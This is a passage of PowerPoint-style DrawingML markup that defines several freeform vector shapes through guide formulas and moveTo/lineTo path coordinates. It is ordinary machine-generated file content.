                  <a:gd name="T34" fmla="*/ 0 w 141"/>
                  <a:gd name="T35" fmla="*/ 0 h 25"/>
                  <a:gd name="T36" fmla="*/ 0 w 141"/>
                  <a:gd name="T37" fmla="*/ 0 h 25"/>
                  <a:gd name="T38" fmla="*/ 0 w 141"/>
                  <a:gd name="T39" fmla="*/ 0 h 25"/>
                  <a:gd name="T40" fmla="*/ 0 w 141"/>
                  <a:gd name="T41" fmla="*/ 0 h 25"/>
                  <a:gd name="T42" fmla="*/ 0 w 141"/>
                  <a:gd name="T43" fmla="*/ 0 h 25"/>
                  <a:gd name="T44" fmla="*/ 0 w 141"/>
                  <a:gd name="T45" fmla="*/ 0 h 25"/>
                  <a:gd name="T46" fmla="*/ 0 w 141"/>
                  <a:gd name="T47" fmla="*/ 0 h 25"/>
                  <a:gd name="T48" fmla="*/ 0 w 141"/>
                  <a:gd name="T49" fmla="*/ 0 h 25"/>
                  <a:gd name="T50" fmla="*/ 0 w 141"/>
                  <a:gd name="T51" fmla="*/ 0 h 25"/>
                  <a:gd name="T52" fmla="*/ 0 w 141"/>
                  <a:gd name="T53" fmla="*/ 0 h 25"/>
                  <a:gd name="T54" fmla="*/ 0 w 141"/>
                  <a:gd name="T55" fmla="*/ 0 h 25"/>
                  <a:gd name="T56" fmla="*/ 0 w 141"/>
                  <a:gd name="T57" fmla="*/ 0 h 25"/>
                  <a:gd name="T58" fmla="*/ 0 w 141"/>
                  <a:gd name="T59" fmla="*/ 0 h 25"/>
                  <a:gd name="T60" fmla="*/ 0 w 141"/>
                  <a:gd name="T61" fmla="*/ 0 h 25"/>
                  <a:gd name="T62" fmla="*/ 0 w 141"/>
                  <a:gd name="T63" fmla="*/ 0 h 25"/>
                  <a:gd name="T64" fmla="*/ 0 w 141"/>
                  <a:gd name="T65" fmla="*/ 0 h 25"/>
                  <a:gd name="T66" fmla="*/ 0 w 141"/>
                  <a:gd name="T67" fmla="*/ 0 h 25"/>
                  <a:gd name="T68" fmla="*/ 0 w 141"/>
                  <a:gd name="T69" fmla="*/ 0 h 25"/>
                  <a:gd name="T70" fmla="*/ 0 w 141"/>
                  <a:gd name="T71" fmla="*/ 0 h 25"/>
                  <a:gd name="T72" fmla="*/ 0 w 141"/>
                  <a:gd name="T73" fmla="*/ 0 h 25"/>
                  <a:gd name="T74" fmla="*/ 0 w 141"/>
                  <a:gd name="T75" fmla="*/ 0 h 25"/>
                  <a:gd name="T76" fmla="*/ 0 w 141"/>
                  <a:gd name="T77" fmla="*/ 0 h 25"/>
                  <a:gd name="T78" fmla="*/ 0 w 141"/>
                  <a:gd name="T79" fmla="*/ 0 h 25"/>
                  <a:gd name="T80" fmla="*/ 0 w 141"/>
                  <a:gd name="T81" fmla="*/ 0 h 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5"/>
                  <a:gd name="T125" fmla="*/ 141 w 141"/>
                  <a:gd name="T126" fmla="*/ 25 h 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5">
                    <a:moveTo>
                      <a:pt x="1" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1"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3099" name="Freeform 103"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="642" y="2483"/>
                <a:ext cx="19" cy="10"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 58"/>
                  <a:gd name="T1" fmla="*/ 0 h 32"/>
                  <a:gd name="T2" fmla="*/ 0 w 58"/>
                  <a:gd name="T3" fmla="*/ 0 h 32"/>
                  <a:gd name="T4" fmla="*/ 0 w 58"/>
                  <a:gd name="T5" fmla="*/ 0 h 32"/>
                  <a:gd name="T6" fmla="*/ 0 w 58"/>
                  <a:gd name="T7" fmla="*/ 0 h 32"/>
                  <a:gd name="T8" fmla="*/ 0 w 58"/>
                  <a:gd name="T9" fmla="*/ 0 h 32"/>
                  <a:gd name="T10" fmla="*/ 0 w 58"/>
                  <a:gd name="T11" fmla="*/ 0 h 32"/>
                  <a:gd name="T12" fmla="*/ 0 w 58"/>
                  <a:gd name="T13" fmla="*/ 0 h 32"/>
                  <a:gd name="T14" fmla="*/ 0 w 58"/>
                  <a:gd name="T15" fmla="*/ 0 h 32"/>
                  <a:gd name="T16" fmla="*/ 0 w 58"/>
                  <a:gd name="T17" fmla="*/ 0 h 32"/>
                  <a:gd name="T18" fmla="*/ 0 w 58"/>
                  <a:gd name="T19" fmla="*/ 0 h 32"/>
                  <a:gd name="T20" fmla="*/ 0 w 58"/>
                  <a:gd name="T21" fmla="*/ 0 h 32"/>
                  <a:gd name="T22" fmla="*/ 0 w 58"/>
                  <a:gd name="T23" fmla="*/ 0 h 32"/>
                  <a:gd name="T24" fmla="*/ 0 w 58"/>
                  <a:gd name="T25" fmla="*/ 0 h 32"/>
                  <a:gd name="T26" fmla="*/ 0 w 58"/>
                  <a:gd name="T27" fmla="*/ 0 h 32"/>
                  <a:gd name="T28" fmla="*/ 0 w 58"/>
                  <a:gd name="T29" fmla="*/ 0 h 32"/>
                  <a:gd name="T30" fmla="*/ 0 w 58"/>
                  <a:gd name="T31" fmla="*/ 0 h 32"/>
                  <a:gd name="T32" fmla="*/ 0 w 58"/>
                  <a:gd name="T33" fmla="*/ 0 h 32"/>
                  <a:gd name="T34" fmla="*/ 0 w 58"/>
                  <a:gd name="T35" fmla="*/ 0 h 32"/>
                  <a:gd name="T36" fmla="*/ 0 w 58"/>
                  <a:gd name="T37" fmla="*/ 0 h 32"/>
                  <a:gd name="T38" fmla="*/ 0 w 58"/>
                  <a:gd name="T39" fmla="*/ 0 h 32"/>
                  <a:gd name="T40" fmla="*/ 0 w 58"/>
                  <a:gd name="T41" fmla="*/ 0 h 32"/>
                  <a:gd name="T42" fmla="*/ 0 w 58"/>
                  <a:gd name="T43" fmla="*/ 0 h 32"/>
                  <a:gd name="T44" fmla="*/ 0 w 58"/>
                  <a:gd name="T45" fmla="*/ 0 h 32"/>
                  <a:gd name="T46" fmla="*/ 0 w 58"/>
                  <a:gd name="T47" fmla="*/ 0 h 32"/>
                  <a:gd name="T48" fmla="*/ 0 w 58"/>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32"/>
                  <a:gd name="T77" fmla="*/ 58 w 58"/>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32">
                    <a:moveTo>
                      <a:pt x="3" y="10"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="1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3100" name="Freeform 104"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="620" y="2484"/>
                <a:ext cx="12" cy="14"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 39"/>
                  <a:gd name="T1" fmla="*/ 0 h 41"/>
                  <a:gd name="T2" fmla="*/ 0 w 39"/>
                  <a:gd name="T3" fmla="*/ 0 h 41"/>
                  <a:gd name="T4" fmla="*/ 0 w 39"/>
                  <a:gd name="T5" fmla="*/ 0 h 41"/>
                  <a:gd name="T6" fmla="*/ 0 w 39"/>
                  <a:gd name="T7" fmla="*/ 0 h 41"/>
                  <a:gd name="T8" fmla="*/ 0 w 39"/>
                  <a:gd name="T9" fmla="*/ 0 h 41"/>
                  <a:gd name="T10" fmla="*/ 0 w 39"/>
                  <a:gd name="T11" fmla="*/ 0 h 41"/>
                  <a:gd name="T12" fmla="*/ 0 w 39"/>
                  <a:gd name="T13" fmla="*/ 0 h 41"/>
                  <a:gd name="T14" fmla="*/ 0 w 39"/>
                  <a:gd name="T15" fmla="*/ 0 h 41"/>
                  <a:gd name="T16" fmla="*/ 0 w 39"/>
                  <a:gd name="T17" fmla="*/ 0 h 41"/>
                  <a:gd name="T18" fmla="*/ 0 w 39"/>
                  <a:gd name="T19" fmla="*/ 0 h 41"/>
                  <a:gd name="T20" fmla="*/ 0 w 39"/>
                  <a:gd name="T21" fmla="*/ 0 h 41"/>
                  <a:gd name="T22" fmla="*/ 0 w 39"/>
                  <a:gd name="T23" fmla="*/ 0 h 41"/>
                  <a:gd name="T24" fmla="*/ 0 w 39"/>
                  <a:gd name="T25" fmla="*/ 0 h 41"/>
                  <a:gd name="T26" fmla="*/ 0 w 39"/>
                  <a:gd name="T27" fmla="*/ 0 h 41"/>
                  <a:gd name="T28" fmla="*/ 0 w 39"/>
                  <a:gd name="T29" fmla="*/ 0 h 41"/>
                  <a:gd name="T30" fmla="*/ 0 w 39"/>
                  <a:gd name="T31" fmla="*/ 0 h 41"/>
                  <a:gd name="T32" fmla="*/ 0 w 39"/>
                  <a:gd name="T33" fmla="*/ 0 h 41"/>
                  <a:gd name="T34" fmla="*/ 0 w 39"/>
                  <a:gd name="T35" fmla="*/ 0 h 41"/>
                  <a:gd name="T36" fmla="*/ 0 w 39"/>
                  <a:gd name="T37" fmla="*/ 0 h 41"/>
                  <a:gd name="T38" fmla="*/ 0 w 39"/>
                  <a:gd name="T39" fmla="*/ 0 h 41"/>
                  <a:gd name="T40" fmla="*/ 0 w 39"/>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41"/>
                  <a:gd name="T65" fmla="*/ 39 w 39"/>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41">
                    <a:moveTo>
                      <a:pt x="0" y="36"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36"/>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3101" name="Freeform 105"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="604" y="2491"/>
                <a:ext cx="39" cy="26"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 118"/>
                  <a:gd name="T1" fmla="*/ 0 h 83"/>
                  <a:gd name="T2" fmla="*/ 0 w 118"/>
                  <a:gd name="T3" fmla="*/ 0 h 83"/>
                  <a:gd name="T4" fmla="*/ 0 w 118"/>
                  <a:gd name="T5" fmla="*/ 0 h 83"/>
                  <a:gd name="T6" fmla="*/ 0 w 118"/>
                  <a:gd name="T7" fmla="*/ 0 h 83"/>
                  <a:gd name="T8" fmla="*/ 0 w 118"/>
                  <a:gd name="T9" fmla="*/ 0 h 83"/>
                  <a:gd name="T10" fmla="*/ 0 w 118"/>
                  <a:gd name="T11" fmla="*/ 0 h 83"/>
                  <a:gd name="T12" fmla="*/ 0 w 118"/>
                  <a:gd name="T13" fmla="*/ 0 h 83"/>
                  <a:gd name="T14" fmla="*/ 0 w 118"/>
                  <a:gd name="T15" fmla="*/ 0 h 83"/>
                  <a:gd name="T16" fmla="*/ 0 w 118"/>
                  <a:gd name="T17" fmla="*/ 0 h 83"/>
                  <a:gd name="T18" fmla="*/ 0 w 118"/>
                  <a:gd name="T19" fmla="*/ 0 h 83"/>
                  <a:gd name="T20" fmla="*/ 0 w 118"/>
                  <a:gd name="T21" fmla="*/ 0 h 83"/>
                  <a:gd name="T22" fmla="*/ 0 w 118"/>
                  <a:gd name="T23" fmla="*/ 0 h 83"/>
                  <a:gd name="T24" fmla="*/ 0 w 118"/>
                  <a:gd name="T25" fmla="*/ 0 h 83"/>
                  <a:gd name="T26" fmla="*/ 0 w 118"/>
                  <a:gd name="T27" fmla="*/ 0 h 83"/>
                  <a:gd name="T28" fmla="*/ 0 w 118"/>
                  <a:gd name="T29" fmla="*/ 0 h 83"/>
                  <a:gd name="T30" fmla="*/ 0 w 118"/>
                  <a:gd name="T31" fmla="*/ 0 h 83"/>
                  <a:gd name="T32" fmla="*/ 0 w 118"/>
                  <a:gd name="T33" fmla="*/ 0 h 83"/>
                  <a:gd name="T34" fmla="*/ 0 w 118"/>
                  <a:gd name="T35" fmla="*/ 0 h 83"/>
                  <a:gd name="T36" fmla="*/ 0 w 118"/>
                  <a:gd name="T37" fmla="*/ 0 h 83"/>
                  <a:gd name="T38" fmla="*/ 0 w 118"/>
                  <a:gd name="T39" fmla="*/ 0 h 83"/>
                  <a:gd name="T40" fmla="*/ 0 w 118"/>
                  <a:gd name="T41" fmla="*/ 0 h 83"/>
                  <a:gd name="T42" fmla="*/ 0 w 118"/>
                  <a:gd name="T43" fmla="*/ 0 h 83"/>
                  <a:gd name="T44" fmla="*/ 0 w 118"/>
                  <a:gd name="T45" fmla="*/ 0 h 83"/>
                  <a:gd name="T46" fmla="*/ 0 w 118"/>
                  <a:gd name="T47" fmla="*/ 0 h 83"/>
                  <a:gd name="T48" fmla="*/ 0 w 118"/>
                  <a:gd name="T49" fmla="*/ 0 h 83"/>
                  <a:gd name="T50" fmla="*/ 0 w 118"/>
                  <a:gd name="T51" fmla="*/ 0 h 83"/>
                  <a:gd name="T52" fmla="*/ 0 w 118"/>
                  <a:gd name="T53" fmla="*/ 0 h 83"/>
                  <a:gd name="T54" fmla="*/ 0 w 118"/>
                  <a:gd name="T55" fmla="*/ 0 h 83"/>
                  <a:gd name="T56" fmla="*/ 0 w 118"/>
                  <a:gd name="T57" fmla="*/ 0 h 83"/>
                  <a:gd name="T58" fmla="*/ 0 w 118"/>
                  <a:gd name="T59" fmla="*/ 0 h 83"/>
                  <a:gd name="T60" fmla="*/ 0 w 118"/>
                  <a:gd name="T61" fmla="*/ 0 h 83"/>
                  <a:gd name="T62" fmla="*/ 0 w 118"/>
                  <a:gd name="T63" fmla="*/ 0 h 83"/>
                  <a:gd name="T64" fmla="*/ 0 w 118"/>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83"/>
                  <a:gd name="T101" fmla="*/ 118 w 118"/>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83">
                    <a:moveTo>
                      <a:pt x="3" y="75"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="9" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="75"/>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3102" name="Freeform 106"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="482" y="2551"/>
                <a:ext cx="61" cy="24"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 188"/>
                  <a:gd name="T1" fmla="*/ 0 h 71"/>
                  <a:gd name="T2" fmla="*/ 0 w 188"/>
                  <a:gd name="T3" fmla="*/ 0 h 71"/>
                  <a:gd name="T4" fmla="*/ 0 w 188"/>
                  <a:gd name="T5" fmla="*/ 0 h 71"/>
                  <a:gd name="T6" fmla="*/ 0 w 188"/>
                  <a:gd name="T7" fmla="*/ 0 h 71"/>
                  <a:gd name="T8" fmla="*/ 0 w 188"/>
                  <a:gd name="T9" fmla="*/ 0 h 71"/>
                  <a:gd name="T10" fmla="*/ 0 w 188"/>
                  <a:gd name="T11" fmla="*/ 0 h 71"/>
                  <a:gd name="T12" fmla="*/ 0 w 188"/>
                  <a:gd name="T13" fmla="*/ 0 h 71"/>
                  <a:gd name="T14" fmla="*/ 0 w 188"/>
                  <a:gd name="T15" fmla="*/ 0 h 71"/>
                  <a:gd name="T16" fmla="*/ 0 w 188"/>
                  <a:gd name="T17" fmla="*/ 0 h 71"/>
                  <a:gd name="T18" fmla="*/ 0 w 188"/>
                  <a:gd name="T19" fmla="*/ 0 h 71"/>
                  <a:gd name="T20" fmla="*/ 0 w 188"/>
                  <a:gd name="T21" fmla="*/ 0 h 71"/>
                  <a:gd name="T22" fmla="*/ 0 w 188"/>
                  <a:gd name="T23" fmla="*/ 0 h 71"/>
                  <a:gd name="T24" fmla="*/ 0 w 188"/>
                  <a:gd name="T25" fmla="*/ 0 h 71"/>
                  <a:gd name="T26" fmla="*/ 0 w 188"/>
                  <a:gd name="T27" fmla="*/ 0 h 71"/>
                  <a:gd name="T28" fmla="*/ 0 w 188"/>
                  <a:gd name="T29" fmla="*/ 0 h 71"/>
                  <a:gd name="T30" fmla="*/ 0 w 188"/>
                  <a:gd name="T31" fmla="*/ 0 h 71"/>
                  <a:gd name="T32" fmla="*/ 0 w 188"/>
                  <a:gd name="T33" fmla="*/ 0 h 71"/>
                  <a:gd name="T34" fmla="*/ 0 w 188"/>
                  <a:gd name="T35" fmla="*/ 0 h 71"/>
                  <a:gd name="T36" fmla="*/ 0 w 188"/>
                  <a:gd name="T37" fmla="*/ 0 h 71"/>
                  <a:gd name="T38" fmla="*/ 0 w 188"/>
                  <a:gd name="T39" fmla="*/ 0 h 71"/>
                  <a:gd name="T40" fmla="*/ 0 w 188"/>
                  <a:gd name="T41" fmla="*/ 0 h 71"/>
                  <a:gd name="T42" fmla="*/ 0 w 188"/>
                  <a:gd name="T43" fmla="*/ 0 h 71"/>
                  <a:gd name="T44" fmla="*/ 0 w 188"/>
                  <a:gd name="T45" fmla="*/ 0 h 71"/>
                  <a:gd name="T46" fmla="*/ 0 w 188"/>
                  <a:gd name="T47" fmla="*/ 0 h 71"/>
                  <a:gd name="T48" fmla="*/ 0 w 188"/>
                  <a:gd name="T49" fmla="*/ 0 h 71"/>
                  <a:gd name="T50" fmla="*/ 0 w 188"/>
                  <a:gd name="T51" fmla="*/ 0 h 71"/>
                  <a:gd name="T52" fmla="*/ 0 w 188"/>
                  <a:gd name="T53" fmla="*/ 0 h 71"/>
                  <a:gd name="T54" fmla="*/ 0 w 188"/>
                  <a:gd name="T55" fmla="*/ 0 h 71"/>
                  <a:gd name="T56" fmla="*/ 0 w 188"/>
                  <a:gd name="T57" fmla="*/ 0 h 71"/>
                  <a:gd name="T58" fmla="*/ 0 w 188"/>
                  <a:gd name="T59" fmla="*/ 0 h 71"/>
                  <a:gd name="T60" fmla="*/ 0 w 188"/>
                  <a:gd name="T61" fmla="*/ 0 h 71"/>
                  <a:gd name="T62" fmla="*/ 0 w 188"/>
                  <a:gd name="T63" fmla="*/ 0 h 71"/>
                  <a:gd name="T64" fmla="*/ 0 w 188"/>
                  <a:gd name="T65" fmla="*/ 0 h 71"/>
                  <a:gd name="T66" fmla="*/ 0 w 188"/>
                  <a:gd name="T67" fmla="*/ 0 h 71"/>
                  <a:gd name="T68" fmla="*/ 0 w 188"/>
                  <a:gd name="T69" fmla="*/ 0 h 71"/>
                  <a:gd name="T70" fmla="*/ 0 w 188"/>
                  <a:gd name="T71" fmla="*/ 0 h 71"/>
                  <a:gd name="T72" fmla="*/ 0 w 188"/>
                  <a:gd name="T73" fmla="*/ 0 h 71"/>
                  <a:gd name="T74" fmla="*/ 0 w 188"/>
                  <a:gd name="T75" fmla="*/ 0 h 71"/>
                  <a:gd name="T76" fmla="*/ 0 w 188"/>
                  <a:gd name="T77" fmla="*/ 0 h 71"/>
                  <a:gd name="T78" fmla="*/ 0 w 188"/>
                  <a:gd name="T79" fmla="*/ 0 h 71"/>
                  <a:gd name="T80" fmla="*/ 0 w 188"/>
                  <a:gd name="T81" fmla="*/ 0 h 71"/>
                  <a:gd name="T82" fmla="*/ 0 w 188"/>
                  <a:gd name="T83" fmla="*/ 0 h 71"/>
                  <a:gd name="T84" fmla="*/ 0 w 188"/>
                  <a:gd name="T85" fmla="*/ 0 h 71"/>
                  <a:gd name="T86" fmla="*/ 0 w 188"/>
                  <a:gd name="T87" fmla="*/ 0 h 71"/>
                  <a:gd name="T88" fmla="*/ 0 w 188"/>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8"/>
                  <a:gd name="T136" fmla="*/ 0 h 71"/>
                  <a:gd name="T137" fmla="*/ 188 w 188"/>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8" h="71">
                    <a:moveTo>
                      <a:pt x="2" y="52"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="9"/>
